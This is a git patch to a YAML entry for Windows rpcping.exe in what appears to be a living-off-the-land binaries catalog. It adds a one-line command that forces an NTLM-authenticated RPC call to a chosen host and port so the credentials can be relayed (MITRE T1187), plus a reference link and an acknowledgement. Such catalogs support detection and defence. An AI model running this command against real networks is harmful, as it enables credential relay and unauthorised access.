From 27b1f9bfb18fce7e0122c61a1269e27f9267c2a7 Mon Sep 17 00:00:00 2001
From: antonioCoco <a.cocomazzi93@gmail.com>
Date: Wed, 29 Sep 2021 23:27:16 +0200
Subject: [PATCH] Update Rpcping.yml

---
 yml/OSBinaries/Rpcping.yml | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

diff --git a/yml/OSBinaries/Rpcping.yml b/yml/OSBinaries/Rpcping.yml
index 3c2d344..8f5eeb6 100644
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@@ -12,6 +12,14 @@ Commands:
     MitreID: T1003
     MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
+    Description: Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
+    Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
+    Category: Credentials
+    Privileges: User
+    MitreID: T1187
+    MitreLink: https://attack.mitre.org/techniques/T1187/
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\rpcping.exe
   - Path: C:\Windows\SysWOW64\rpcping.exe
@@ -23,9 +31,12 @@ Resources:
   - Link: https://github.com/vysec/RedTips
   - Link: https://twitter.com/vysecurity/status/974806438316072960
   - Link: https://twitter.com/vysecurity/status/873181705024266241
+  - Link: https://twitter.com/splinter_code/status/1421144623678988298
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
   - Person: Vincent Yiu
     Handle: '@vysecurity'
----
\ No newline at end of file
+  - Person: Antonio Cocomazzi
+    Handle: '@splinter_code'
+---